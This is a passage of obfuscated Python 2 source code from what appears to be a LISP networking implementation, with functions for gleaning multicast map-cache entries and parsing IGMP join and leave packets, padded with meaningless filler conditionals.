if 4 - 4: Ii1I - II111iiii * iII111i / oO0o - I1IiiI
if 32 - 32: iIii1I11I1II1 - I11i
if 49 - 49: I11i * I1Ii111 - iIii1I11I1II1 * O0
def lisp_build_gleaned_multicast ( seid , geid , rloc , port , igmp ) :
oo0oo = geid . print_address ( )
oo0O0000O00O = seid . print_address_no_iid ( )
OO0o0OO0 = green ( "{}" . format ( oo0O0000O00O ) , False )
iIIi1iI1I1IIi = green ( "(*, {})" . format ( oo0oo ) , False )
I1I111iIiI = red ( rloc . print_address_no_iid ( ) + ":" + str ( port ) , False )
if 71 - 71: oO0o % iIii1I11I1II1 - IiII * o0oOOo0O0Ooo . i11iIiiIii
if 4 - 4: iIii1I11I1II1 - Ii1I
if 46 - 46: OOooOOo / iII111i . i1IIi . i11iIiiIii . iIii1I11I1II1 % I11i
if 62 - 62: I11i % II111iiii % OoooooooOO * ooOoO0o / oO0o
o0oO0o00 = lisp_map_cache_lookup ( seid , geid )
if ( o0oO0o00 == None ) :
o0oO0o00 = lisp_mapping ( "" , "" , [ ] )
o0oO0o00 . group . copy_address ( geid )
o0oO0o00 . eid . copy_address ( geid )
o0oO0o00 . eid . address = 0
o0oO0o00 . eid . mask_len = 0
o0oO0o00 . mapping_source . copy_address ( rloc )
o0oO0o00 . map_cache_ttl = LISP_IGMP_TTL
o0oO0o00 . gleaned = True
o0oO0o00 . add_cache ( )
lprint ( "Add gleaned EID {} to map-cache" . format ( iIIi1iI1I1IIi ) )
if 29 - 29: o0oOOo0O0Ooo / O0 / OoO0O00
if 23 - 23: Ii1I + i11iIiiIii % IiII
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
if 49 - 49: O0
if 72 - 72: I1Ii111
if 96 - 96: II111iiii / OOooOOo % i1IIi / Oo0Ooo
o0oO0O00 = ii1iI1iI11 = IiioOoo = None
if ( o0oO0o00 . rloc_set != [ ] ) :
o0oO0O00 = o0oO0o00 . rloc_set [ 0 ]
if ( o0oO0O00 . rle ) :
ii1iI1iI11 = o0oO0O00 . rle
for oOOooO000O0o0 in ii1iI1iI11 . rle_nodes :
if ( oOOooO000O0o0 . rloc_name != oo0O0000O00O ) : continue
IiioOoo = oOOooO000O0o0
break
if 40 - 40: OOooOOo - oO0o % OoooooooOO
if 40 - 40: I1Ii111 * o0oOOo0O0Ooo * ooOoO0o * I1Ii111 + O0
if 81 - 81: OoooooooOO / O0
if 42 - 42: OOooOOo - OOooOOo - o0oOOo0O0Ooo . OoOoOO00 * oO0o % iIii1I11I1II1
if 94 - 94: I11i * Ii1I + II111iiii / ooOoO0o
if 67 - 67: I11i + I1Ii111
if 15 - 15: OOooOOo * Ii1I / Oo0Ooo . OoO0O00 . I11i
if ( o0oO0O00 == None ) :
o0oO0O00 = lisp_rloc ( )
o0oO0o00 . rloc_set = [ o0oO0O00 ]
o0oO0O00 . priority = 253
o0oO0O00 . mpriority = 255
o0oO0o00 . build_best_rloc_set ( )
if 65 - 65: i11iIiiIii - OoO0O00 / OoooooooOO * I1IiiI % iII111i
if ( ii1iI1iI11 == None ) :
ii1iI1iI11 = lisp_rle ( geid . print_address ( ) )
o0oO0O00 . rle = ii1iI1iI11
if 15 - 15: OOooOOo * Ii1I / ooOoO0o
if ( IiioOoo == None ) :
IiioOoo = lisp_rle_node ( )
IiioOoo . rloc_name = oo0O0000O00O
ii1iI1iI11 . rle_nodes . append ( IiioOoo )
ii1iI1iI11 . build_forwarding_list ( )
lprint ( "Add RLE {} from {} for gleaned EID {}" . format ( I1I111iIiI , OO0o0OO0 , iIIi1iI1I1IIi ) )
elif ( rloc . is_exact_match ( IiioOoo . address ) == False or
port != IiioOoo . translated_port ) :
lprint ( "Changed RLE {} from {} for gleaned EID {}" . format ( I1I111iIiI , OO0o0OO0 , iIIi1iI1I1IIi ) )
if 70 - 70: i11iIiiIii * oO0o . I11i - OoooooooOO / I1ii11iIi11i
if 10 - 10: IiII * OoOoOO00 . II111iiii . II111iiii * Oo0Ooo
if 23 - 23: I1ii11iIi11i + I11i
if 74 - 74: i1IIi % I1IiiI
if 44 - 44: Oo0Ooo - OoooooooOO % ooOoO0o + II111iiii
IiioOoo . store_translated_rloc ( rloc , port )
if 60 - 60: o0oOOo0O0Ooo - ooOoO0o + i11iIiiIii % I1ii11iIi11i % II111iiii
if 62 - 62: Ii1I
if 30 - 30: iII111i % O0 + II111iiii * I1IiiI
if 91 - 91: i11iIiiIii
if 35 - 35: OoOoOO00 * I1Ii111 / Oo0Ooo - i1IIi - IiII + OOooOOo
if ( igmp ) :
I1IIiiiI1I1iiIii = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( I1IIiiiI1I1iiIii ) == False ) :
lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] = { }
if 96 - 96: Oo0Ooo + I1ii11iIi11i . O0
lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] [ oo0oo ] = lisp_get_timestamp ( )
if 62 - 62: i1IIi % OoooooooOO % OoooooooOO
if 53 - 53: O0 * oO0o
if 22 - 22: OOooOOo % Oo0Ooo % ooOoO0o - O0 + i1IIi
if 67 - 67: OoO0O00 / I1IiiI - IiII + iII111i - iII111i
if 4 - 4: IiII . Ii1I . IiII % OoO0O00
if 12 - 12: OoOoOO00 + O0 / O0 . i1IIi
if 58 - 58: IiII . iII111i % O0 . Ii1I * Oo0Ooo
if 54 - 54: OoO0O00 % OOooOOo - OoO0O00 . Oo0Ooo % i1IIi
def lisp_remove_gleaned_multicast ( seid , geid ) :
if 95 - 95: iII111i . OoooooooOO . o0oOOo0O0Ooo / II111iiii - OoooooooOO / I1Ii111
if 11 - 11: II111iiii / iII111i . oO0o / ooOoO0o / OOooOOo + OoO0O00
if 37 - 37: iIii1I11I1II1 * O0
if 64 - 64: I1Ii111 - II111iiii + oO0o % ooOoO0o * oO0o
o0oO0o00 = lisp_map_cache_lookup ( seid , geid )
if ( o0oO0o00 == None ) : return
if 27 - 27: iIii1I11I1II1 - Ii1I . i11iIiiIii / IiII . I1Ii111 / i11iIiiIii
iI1Ii11 = o0oO0o00 . rloc_set [ 0 ] . rle
if ( iI1Ii11 == None ) : return
if 27 - 27: OoOoOO00 . I11i / OoOoOO00
IIiiI11iI = seid . print_address_no_iid ( )
ooOoOO0o = False
for IiioOoo in iI1Ii11 . rle_nodes :
if ( IiioOoo . rloc_name == IIiiI11iI ) :
ooOoOO0o = True
break
if 96 - 96: OoO0O00 - I1IiiI
if 73 - 73: I1IiiI - o0oOOo0O0Ooo - I1Ii111
if ( ooOoOO0o == False ) : return
if 34 - 34: iIii1I11I1II1 - i1IIi + OoO0O00 % Oo0Ooo + i1IIi
if 46 - 46: I1IiiI
if 82 - 82: iII111i . i1IIi
if 38 - 38: Ii1I . I1IiiI . I1ii11iIi11i
iI1Ii11 . rle_nodes . remove ( IiioOoo )
iI1Ii11 . build_forwarding_list ( )
if 26 - 26: O0 - II111iiii * I1Ii111 - OoOoOO00
oo0oo = geid . print_address ( )
I1IIiiiI1I1iiIii = seid . print_address ( )
OO0o0OO0 = green ( "{}" . format ( I1IIiiiI1I1iiIii ) , False )
iIIi1iI1I1IIi = green ( "(*, {})" . format ( oo0oo ) , False )
lprint ( "Gleaned EID {} RLE removed for {}" . format ( iIIi1iI1I1IIi , OO0o0OO0 ) )
if 96 - 96: I11i * Oo0Ooo / OOooOOo - IiII
if 75 - 75: OoooooooOO - O0
if 39 - 39: i11iIiiIii / Ii1I / ooOoO0o
if 93 - 93: o0oOOo0O0Ooo - Oo0Ooo / oO0o / OoOoOO00
if ( lisp_gleaned_groups . has_key ( I1IIiiiI1I1iiIii ) ) :
if ( lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] . has_key ( oo0oo ) ) :
lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] . pop ( oo0oo )
if 75 - 75: o0oOOo0O0Ooo * ooOoO0o % Ii1I
if 94 - 94: OoooooooOO + II111iiii / iIii1I11I1II1 * ooOoO0o
if 85 - 85: ooOoO0o / IiII
if 28 - 28: i11iIiiIii - OoOoOO00
if 13 - 13: O0
if 82 - 82: OoooooooOO
if ( iI1Ii11 . rle_nodes == [ ] ) :
o0oO0o00 . delete_cache ( )
lprint ( "Gleaned EID {} remove, no more RLEs" . format ( iIIi1iI1I1IIi ) )
if 59 - 59: I1Ii111 + I1ii11iIi11i + OoO0O00 % oO0o . i1IIi % O0
if 22 - 22: i1IIi * OoOoOO00 + Ii1I
if 48 - 48: Ii1I % IiII + OoO0O00 . IiII
if 42 - 42: Ii1I
if 70 - 70: I11i
if 82 - 82: O0
if 58 - 58: II111iiii . O0 - OoO0O00 - IiII
if 4 - 4: i11iIiiIii + i11iIiiIii / O0
def lisp_change_gleaned_multicast ( seid , rloc , port ) :
I1IIiiiI1I1iiIii = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( I1IIiiiI1I1iiIii ) == False ) : return
if 46 - 46: I11i % ooOoO0o - Ii1I
for OOo0oOOO0 in lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] :
lisp_geid . store_address ( OOo0oOOO0 )
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , port , False )
if 25 - 25: O0 / i11iIiiIii . O0
if 24 - 24: I1ii11iIi11i - i11iIiiIii / iII111i . Oo0Ooo / I1ii11iIi11i
if 92 - 92: I11i % OoooooooOO
if 14 - 14: i11iIiiIii * i11iIiiIii * OoOoOO00
if 84 - 84: OOooOOo % I1Ii111 + I11i / I1IiiI . iII111i
if 78 - 78: oO0o . Oo0Ooo
if 18 - 18: IiII
if 35 - 35: OoooooooOO / i1IIi - OoO0O00 + Oo0Ooo - o0oOOo0O0Ooo
if 100 - 100: II111iiii % i11iIiiIii % oO0o + O0
if 46 - 46: OoO0O00 / I1IiiI - Oo0Ooo . o0oOOo0O0Ooo . Oo0Ooo % I11i
if 43 - 43: IiII - O0 + I1Ii111 % OoooooooOO % OoO0O00 / I1Ii111
if 48 - 48: I1ii11iIi11i . i1IIi % i1IIi - iII111i * o0oOOo0O0Ooo + IiII
if 45 - 45: II111iiii . II111iiii + I1IiiI / I1Ii111 . OoO0O00 - o0oOOo0O0Ooo
if 20 - 20: ooOoO0o % oO0o
if 28 - 28: i1IIi . II111iiii + O0 / O0 % OoOoOO00 + OOooOOo
if 24 - 24: OoooooooOO
if 11 - 11: i11iIiiIii / iIii1I11I1II1 % ooOoO0o + OOooOOo
if 73 - 73: OoOoOO00 + OoooooooOO + iIii1I11I1II1 + II111iiii * iIii1I11I1II1 - OoOoOO00
if 71 - 71: O0 * OOooOOo . I1IiiI . I1Ii111 * I11i
if 45 - 45: O0 . O0 . II111iiii * ooOoO0o
if 2 - 2: OoO0O00 . o0oOOo0O0Ooo
if 48 - 48: Ii1I
if 45 - 45: I1ii11iIi11i - I11i + Ii1I
if 82 - 82: iII111i
if 81 - 81: i1IIi % OOooOOo - OoO0O00 - Oo0Ooo
if 19 - 19: i1IIi
if 97 - 97: OoO0O00 + i11iIiiIii % I1IiiI * Ii1I
if 89 - 89: IiII % i11iIiiIii + OoO0O00 . oO0o / I1IiiI . Ii1I
if 11 - 11: ooOoO0o - I1Ii111 - I11i + OoOoOO00
if 20 - 20: I11i + O0
if 27 - 27: Oo0Ooo
if 12 - 12: I1ii11iIi11i . iII111i - iII111i - OOooOOo - iIii1I11I1II1
if 50 - 50: I1IiiI - iIii1I11I1II1 . iII111i - Ii1I / I1Ii111 + iII111i
if 46 - 46: OOooOOo + iII111i % Oo0Ooo * iII111i % OoooooooOO * IiII
if 27 - 27: I1IiiI + I1IiiI + I1ii11iIi11i - oO0o * OOooOOo
if 53 - 53: I1ii11iIi11i / OoooooooOO * iIii1I11I1II1
if 4 - 4: I1IiiI . iIii1I11I1II1 + OOooOOo / IiII . o0oOOo0O0Ooo . I11i
if 52 - 52: ooOoO0o % i11iIiiIii . IiII + OoO0O00
if 66 - 66: II111iiii . Ii1I
if 42 - 42: iIii1I11I1II1 * iII111i * I1IiiI
if 66 - 66: Oo0Ooo * i1IIi / I1ii11iIi11i / OoO0O00
if 12 - 12: OOooOOo + iIii1I11I1II1 % I1Ii111 + OOooOOo
if 19 - 19: OoO0O00 / I1IiiI - o0oOOo0O0Ooo - i1IIi + I1ii11iIi11i * OoooooooOO
if 74 - 74: I1Ii111 . I11i / Oo0Ooo
if 88 - 88: oO0o % OoO0O00 - i11iIiiIii % I1Ii111 / O0 * IiII
if 99 - 99: o0oOOo0O0Ooo . ooOoO0o / i11iIiiIii
if 44 - 44: IiII + OOooOOo % OoO0O00 . OoooooooOO * O0
if 72 - 72: i1IIi - iII111i * I1IiiI % O0 - I11i * O0
if 78 - 78: I1IiiI - OoO0O00 / Ii1I . i1IIi
if 30 - 30: IiII
if 21 - 21: i1IIi . iII111i - I1IiiI
if 28 - 28: IiII / Ii1I - i1IIi - OoOoOO00
if 65 - 65: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo
if 77 - 77: OoooooooOO - Oo0Ooo - OoOoOO00 / I11i / O0 . i11iIiiIii
if 27 - 27: I1Ii111 * O0
if 9 - 9: i1IIi - Oo0Ooo - i11iIiiIii / iIii1I11I1II1 . i1IIi
if 2 - 2: I11i + II111iiii - I11i / oO0o / I11i
if 73 - 73: IiII % I1Ii111 . OoOoOO00
if 96 - 96: I1IiiI / ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I . I11i
if 87 - 87: Oo0Ooo / IiII * OOooOOo + I1ii11iIi11i . I11i
if 56 - 56: oO0o + oO0o % o0oOOo0O0Ooo + OOooOOo . II111iiii + i11iIiiIii
if 45 - 45: iIii1I11I1II1 / o0oOOo0O0Ooo * OoooooooOO - Oo0Ooo
if 77 - 77: II111iiii
if 8 - 8: I1IiiI * II111iiii % I1ii11iIi11i
if 88 - 88: Oo0Ooo . oO0o + OoOoOO00 % OoooooooOO
if 81 - 81: OoooooooOO . I1Ii111 + OoO0O00 % I1Ii111
if 49 - 49: oO0o . oO0o % oO0o / Oo0Ooo
if 62 - 62: ooOoO0o . i1IIi % OoO0O00 - I1ii11iIi11i - IiII
if 57 - 57: i1IIi - II111iiii - O0 . iII111i + OoO0O00
if 67 - 67: OOooOOo * iII111i / iIii1I11I1II1 / I1ii11iIi11i
if 10 - 10: OoooooooOO % I1ii11iIi11i * i1IIi . iII111i
if 96 - 96: II111iiii % i11iIiiIii - Oo0Ooo
if 70 - 70: O0 * iIii1I11I1II1 - IiII * I11i / Ii1I + i11iIiiIii
if 26 - 26: II111iiii - I11i % I11i / ooOoO0o + Oo0Ooo
if 91 - 91: I1IiiI % Ii1I - OOooOOo - Oo0Ooo / I1IiiI / OoO0O00
if 40 - 40: OoooooooOO
if 71 - 71: OOooOOo
if 88 - 88: O0
if 44 - 44: II111iiii - IiII / I1IiiI + ooOoO0o % iII111i - iII111i
if 53 - 53: OoooooooOO
if 41 - 41: i1IIi - oO0o
if 41 - 41: I11i
if 92 - 92: i11iIiiIii
if 62 - 62: i1IIi / I1IiiI - o0oOOo0O0Ooo
if 3 - 3: O0 * OoOoOO00 * I11i / OoOoOO00
if 77 - 77: i1IIi
if 3 - 3: iII111i * OoO0O00 - oO0o + iII111i . o0oOOo0O0Ooo + I1IiiI
if 65 - 65: O0 / OoOoOO00
if 77 - 77: OoO0O00
if 17 - 17: i1IIi
if 35 - 35: OoOoOO00
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 61 - 61: I1Ii111
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 78 - 78: I1Ii111 * Ii1I % Ii1I + I1IiiI
def lisp_process_igmp_packet ( packet ) :
iI1Iii1i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
iI1Iii1i1 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
iI1Iii1i1 = bold ( "from {}" . format ( iI1Iii1i1 . print_address_no_iid ( ) ) , False )
if 83 - 83: iIii1I11I1II1 + O0 / IiII . iIii1I11I1II1
I1I111iIiI = bold ( "Receive" , False )
lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( I1I111iIiI , len ( packet ) , iI1Iii1i1 ,
lisp_format_packet ( packet ) ) )
if 74 - 74: Oo0Ooo
if 60 - 60: OoooooooOO
if 16 - 16: iIii1I11I1II1 - OoOoOO00 / I1ii11iIi11i % O0 % o0oOOo0O0Ooo
if 99 - 99: ooOoO0o . o0oOOo0O0Ooo - O0 * I1Ii111 . i11iIiiIii / iIii1I11I1II1
IiiIIi = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 69 - 69: i1IIi + O0
if 67 - 67: I1ii11iIi11i * iIii1I11I1II1 / O0 - I1Ii111
if 82 - 82: I1ii11iIi11i % i11iIiiIii - OoOoOO00 / I1Ii111 * o0oOOo0O0Ooo * OoO0O00
if 85 - 85: Oo0Ooo + Ii1I - OoooooooOO . O0
IIiI = packet [ IiiIIi : : ]
iiIIIIiII = struct . unpack ( "B" , IIiI [ 0 ] ) [ 0 ]
if 93 - 93: I1Ii111 + II111iiii / iIii1I11I1II1 + Ii1I . OoOoOO00
if 74 - 74: Ii1I % II111iiii % Ii1I % IiII
if 65 - 65: OoOoOO00 * OoO0O00 . I11i % ooOoO0o
if 6 - 6: ooOoO0o / i1IIi . oO0o . IiII + OoooooooOO
if 40 - 40: Oo0Ooo
OOo0oOOO0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
OOo0oOOO0 . address = socket . ntohl ( struct . unpack ( "II" , IIiI [ : 8 ] ) [ 1 ] )
oo0oo = OOo0oOOO0 . print_address_no_iid ( )
if 24 - 24: OoO0O00 + II111iiii + IiII
if ( iiIIIIiII == 17 ) :
lprint ( "IGMP Query for group {}" . format ( oo0oo ) )
return ( True )
if 23 - 23: i1IIi . II111iiii
if 60 - 60: ooOoO0o * oO0o + Oo0Ooo / iIii1I11I1II1
OoOoO0o = ( iiIIIIiII in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( OoOoO0o == False ) :
oo0O000O0O0oO0O = "{} ({})" . format ( iiIIIIiII , igmp_types [ iiIIIIiII ] ) if igmp_types . has_key ( iiIIIIiII ) else iiIIIIiII
if 21 - 21: I1Ii111 % Ii1I
lprint ( "IGMP type {} not supported" . format ( oo0O000O0O0oO0O ) )
return ( [ ] )
if 61 - 61: I1Ii111 - iII111i + IiII . i11iIiiIii + OOooOOo + i11iIiiIii
if 74 - 74: ooOoO0o
if ( len ( IIiI ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 55 - 55: II111iiii
if 7 - 7: I1Ii111 % o0oOOo0O0Ooo . oO0o . ooOoO0o % i1IIi / I1IiiI
if 88 - 88: i11iIiiIii / oO0o - i1IIi / I1IiiI
if 57 - 57: oO0o + O0 * I11i
if 87 - 87: o0oOOo0O0Ooo % Oo0Ooo * I1ii11iIi11i / OoooooooOO / o0oOOo0O0Ooo
if ( iiIIIIiII == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( oo0oo , False ) ) )
return ( [ [ None , oo0oo , False ] ] )
if 78 - 78: Ii1I
if ( iiIIIIiII in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( iiIIIIiII == 0x12 ) else 2 , bold ( oo0oo , False ) ) )
if 5 - 5: i1IIi * ooOoO0o / OoOoOO00 % i11iIiiIii
if 57 - 57: IiII
if 89 - 89: I1ii11iIi11i - I1Ii111 + o0oOOo0O0Ooo
if 62 - 62: I1ii11iIi11i + OoooooooOO * OOooOOo
if 49 - 49: i1IIi - I11i * II111iiii
if ( oo0oo . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , oo0oo , True ] ] )
if 4 - 4: o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 57 - 57: I1IiiI * OOooOOo . i11iIiiIii * oO0o - OoOoOO00
if 35 - 35: O0
if 65 - 65: Oo0Ooo
if 100 - 100: I1Ii111 . o0oOOo0O0Ooo * OoooooooOO . o0oOOo0O0Ooo
return ( [ ] )
if 90 - 90: i11iIiiIii . I1IiiI + ooOoO0o * OoooooooOO * OoooooooOO + oO0o
if 77 - 77: OOooOOo * OoOoOO00
if 75 - 75: Oo0Ooo * Oo0Ooo - IiII - OoOoOO00 / i11iIiiIii + I1Ii111
if 57 - 57: i11iIiiIii / oO0o
if 37 - 37: o0oOOo0O0Ooo + OoOoOO00 - i1IIi . Oo0Ooo
O000oOooO0oo = OOo0oOOO0 . address
IIiI = IIiI [ 8 : : ]
if 3 - 3: ooOoO0o % OoooooooOO / I1Ii111 + oO0o - O0
oOO0ooo000OOo = "BBHI"
I1o0 = struct . calcsize ( oOO0ooo000OOo )
I1i11 = "I"
IIiI1 = struct . calcsize ( I1i11 )
iI1Iii1i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 36 - 36: Oo0Ooo
if 87 - 87: oO0o + i1IIi * Ii1I * oO0o
if 17 - 17: Ii1I * Ii1I
if 60 - 60: oO0o % i1IIi * iIii1I11I1II1 . IiII - iIii1I11I1II1
o0oo = [ ]
for iIi1I1 in range ( O000oOooO0oo ) :
if ( len ( IIiI ) < I1o0 ) : return
oO000o , oOo0oo , iiI1IIiI111i1 , ii1i1II11II1i = struct . unpack ( oOO0ooo000OOo ,
IIiI [ : I1o0 ] )
if 71 - 71: IiII
IIiI = IIiI [ I1o0 : : ]
if 34 - 34: II111iiii
if ( lisp_igmp_record_types . has_key ( oO000o ) == False ) :
lprint ( "Invalid record type {}" . format ( oO000o ) )
continue
if 7 - 7: IiII / I1ii11iIi11i
if 88 - 88: iIii1I11I1II1 / o0oOOo0O0Ooo
OoO0o0OOOoo = lisp_igmp_record_types [ oO000o ]
iiI1IIiI111i1 = socket . ntohs ( iiI1IIiI111i1 )
OOo0oOOO0 . address = socket . ntohl ( ii1i1II11II1i )
oo0oo = OOo0oOOO0 . print_address_no_iid ( )
if 28 - 28: I1IiiI
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( OoO0o0OOOoo , oo0oo , iiI1IIiI111i1 ) )
if 99 - 99: I1IiiI / oO0o . OoO0O00 / ooOoO0o + IiII
if 3 - 3: II111iiii . OOooOOo * i11iIiiIii / I11i
if 16 - 16: I1ii11iIi11i - ooOoO0o + OoO0O00 . I11i / O0
if 56 - 56: I1IiiI + Oo0Ooo * II111iiii + iIii1I11I1II1
if 56 - 56: o0oOOo0O0Ooo * I1IiiI - I11i * I1Ii111 - I11i
if 92 - 92: oO0o % iIii1I11I1II1 * o0oOOo0O0Ooo * OoooooooOO - iIii1I11I1II1
if 51 - 51: Ii1I - OoO0O00 + i1IIi
IiI11III = False
if ( oO000o in ( 1 , 5 ) ) : IiI11III = True
if ( oO000o in ( 2 , 4 ) and iiI1IIiI111i1 == 0 ) : IiI11III = True
IiIII1i1i1 = "join" if ( IiI11III ) else "leave"
if 23 - 23: OoO0O00 + o0oOOo0O0Ooo * I1IiiI
if 76 - 76: i1IIi . OOooOOo
if 78 - 78: OoooooooOO % OoOoOO00 * oO0o . I1ii11iIi11i
if 79 - 79: OoooooooOO
if ( oo0oo . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 6 - 6: i11iIiiIii / II111iiii + II111iiii + I1ii11iIi11i % IiII - I1ii11iIi11i
if 92 - 92: IiII
if 49 - 49: O0 . OoOoOO00
if 7 - 7: i1IIi + II111iiii
if 96 - 96: I1Ii111 / OoO0O00
if 27 - 27: Ii1I
if 90 - 90: I1ii11iIi11i
if 43 - 43: OoO0O00 . I1IiiI . oO0o + Ii1I
if ( iiI1IIiI111i1 == 0 ) :
o0oo . append ( [ None , oo0oo , IiI11III ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( IiIII1i1i1 , False ) ,
bold ( oo0oo , False ) ) )
if 7 - 7: iII111i / Oo0Ooo - OoO0O00 + I1Ii111 * II111iiii * ooOoO0o
if 80 - 80: oO0o - i1IIi / I11i . II111iiii % O0 % I11i
if 70 - 70: iIii1I11I1II1 * i1IIi * OOooOOo - Oo0Ooo % i1IIi
if 60 - 60: o0oOOo0O0Ooo . OOooOOo % II111iiii - I1ii11iIi11i
if 4 - 4: OOooOOo % ooOoO0o
for oO00000o0OO0 in range ( iiI1IIiI111i1 ) :
if ( len ( IIiI ) < IIiI1 ) : return
ii1i1II11II1i = struct . unpack ( I1i11 , IIiI [ : IIiI1 ] ) [ 0 ]
iI1Iii1i1 . address = socket . ntohl ( ii1i1II11II1i )
i1iIi1III11 = iI1Iii1i1 . print_address_no_iid ( )
o0oo . append ( [ i1iIi1III11 , oo0oo , IiI11III ] )
lprint ( "{} ({}, {})" . format ( IiIII1i1i1 ,
green ( i1iIi1III11 , False ) , bold ( oo0oo , False ) ) )
IIiI = IIiI [ IIiI1 : : ]
if 67 - 67: i11iIiiIii / Oo0Ooo - o0oOOo0O0Ooo % II111iiii / iIii1I11I1II1 . o0oOOo0O0Ooo
if 49 - 49: II111iiii
if 9 - 9: o0oOOo0O0Ooo
if 47 - 47: Ii1I * I1Ii111 / II111iiii
if 73 - 73: ooOoO0o
if 53 - 53: IiII . Oo0Ooo
if 54 - 54: i11iIiiIii % ooOoO0o % I1Ii111 + o0oOOo0O0Ooo
if 2 - 2: IiII
return ( o0oo )
if 25 - 25: OoOoOO00 . OoO0O00 * o0oOOo0O0Ooo . OoooooooOO - Oo0Ooo + I1IiiI
if 82 - 82: OoO0O00 - Ii1I * I11i * o0oOOo0O0Ooo
if 17 - 17: OoooooooOO + I1Ii111
if 91 - 91: iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo
if 98 - 98: o0oOOo0O0Ooo % II111iiii * IiII - i11iIiiIii * oO0o
if 15 - 15: O0 - II111iiii - Oo0Ooo . I1ii11iIi11i % OoO0O00
if 63 - 63: o0oOOo0O0Ooo / OoOoOO00 % I1ii11iIi11i % I11i
if 58 - 58: O0 + iII111i
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 66 - 66: i1IIi . O0 . i1IIi - iIii1I11I1II1 - ooOoO0o % I1ii11iIi11i
def lisp_glean_map_cache ( seid , rloc , encap_port , igmp ) :
if 96 - 96: i1IIi + oO0o - OoOoOO00 - OoOoOO00
if 13 - 13: I11i
if 52 - 52: iII111i . OoOoOO00 * iIii1I11I1II1 . iII111i * IiII
if 52 - 52: iII111i + iII111i
if 35 - 35: I1Ii111 * oO0o + Ii1I / I1IiiI + O0 - I11i
if 42 - 42: o0oOOo0O0Ooo
o0oOOOoo = True
o0oO0o00 = lisp_map_cache . lookup_cache ( seid , True )
if ( o0oO0o00 and len ( o0oO0o00 . rloc_set ) != 0 ) :
o0oO0o00 . last_refresh_time = lisp_get_timestamp ( )
if 31 - 31: oO0o * Ii1I % i1IIi
iIiiI1I1 = o0oO0o00 . rloc_set [ 0 ]
iIi11Ii1 = iIiiI1I1 . rloc
OoiiI11Iii = iIiiI1I1 . translated_port
o0oOOOoo = ( iIi11Ii1 . is_exact_match ( rloc ) == False or
OoiiI11Iii != encap_port )
if 37 - 37: I11i + o0oOOo0O0Ooo . o0oOOo0O0Ooo
if ( o0oOOOoo ) :
iIIi1iI1I1IIi = green ( seid . print_address ( ) , False )
I1I111iIiI = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Change gleaned EID {} to RLOC {}" . format ( iIIi1iI1I1IIi , I1I111iIiI ) )
iIiiI1I1 . delete_from_rloc_probe_list ( o0oO0o00 . eid , o0oO0o00 . group )
lisp_change_gleaned_multicast ( seid , rloc , encap_port )
if 8 - 8: Oo0Ooo * Ii1I % I11i - OoooooooOO
else :
o0oO0o00 = lisp_mapping ( "" , "" , [ ] )
o0oO0o00 . eid . copy_address ( seid )
o0oO0o00 . mapping_source . copy_address ( rloc )
o0oO0o00 . map_cache_ttl = LISP_GLEAN_TTL
o0oO0o00 . gleaned = True
iIIi1iI1I1IIi = green ( seid . print_address ( ) , False )
I1I111iIiI = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Add gleaned EID {} to map-cache with RLOC {}" . format ( iIIi1iI1I1IIi , I1I111iIiI ) )
o0oO0o00 . add_cache ( )
if 11 - 11: OoO0O00 - oO0o
if 50 - 50: II111iiii * IiII
if 26 - 26: OoO0O00 . II111iiii
if 19 - 19: iII111i / i11iIiiIii
if 31 - 31: I1Ii111 / I1Ii111 % IiII
if ( o0oOOOoo ) :
o0oO0O00 = lisp_rloc ( )
o0oO0O00 . store_translated_rloc ( rloc , encap_port )
o0oO0O00 . add_to_rloc_probe_list ( o0oO0o00 . eid , o0oO0o00 . group )
o0oO0O00 . priority = 253
o0oO0O00 . mpriority = 255
OoO0oOOooOO = [ o0oO0O00 ]
o0oO0o00 . rloc_set = OoO0oOOooOO
o0oO0o00 . build_best_rloc_set ( )
if 68 - 68: O0 / OOooOOo % OoOoOO00
if 68 - 68: OoooooooOO - IiII + I1IiiI * IiII / I11i - OoO0O00
if 69 - 69: oO0o / II111iiii
if 56 - 56: i1IIi + II111iiii + Ii1I . OoooooooOO
if 26 - 26: OoooooooOO % Ii1I % I11i * oO0o - i1IIi - i1IIi
if ( igmp == None ) : return
if 76 - 76: i11iIiiIii + OoO0O00 - iII111i . OoOoOO00 * Oo0Ooo
